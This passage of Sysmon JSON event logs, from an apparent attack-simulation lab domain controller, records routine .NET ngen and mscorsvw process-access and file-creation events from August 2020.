icrosoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8397,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.357\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-00101FE50E00}\r\nTargetProcessId: 4228\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.357","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-00101FE50E00}","TargetProcessId":"4228","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8398,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.357\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-00101FE50E00}\r\nTargetProcessId: 4228\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.357","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-00101FE50E00}","TargetProcessId":"4228","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8399,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:10.638\r\nProcessGuid: {E2A3D6B1-1372-5F25-0000-00101FE50E00}\r\nProcessId: 4228\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1084-0\\System.Dynamic.dll\r\nCreationUtcTime: 2020-08-01 07:02:10.638","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:10.638","ProcessGuid":"{E2A3D6B1-1372-5F25-0000-00101FE50E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1084-0\\System.Dynamic.dll","CreationUtcTime":"2020-08-01 07:02:10.638","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8400,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.669\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-0010D8E90E00}\r\nTargetProcessId: 4724\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.669","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-0010D8E90E00}","TargetProcessId":"4724","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8401,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.669\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-0010D8E90E00}\r\nTargetProcessId: 4724\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.669","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-0010D8E90E00}","TargetProcessId":"4724","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8402,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.669\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-0010D8E90E00}\r\nTargetProcessId: 4724\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.669","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-0010D8E90E00}","TargetProcessId":"4724","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8403,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.716\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-0010A3ED0E00}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.716","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-0010A3ED0E00}","TargetProcessId":"4692","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8404,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.716\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-0010A3ED0E00}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.716","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-0010A3ED0E00}","TargetProcessId":"4692","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8405,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.716\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-0010A3ED0E00}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.716","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-0010A3ED0E00}","TargetProcessId":"4692","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
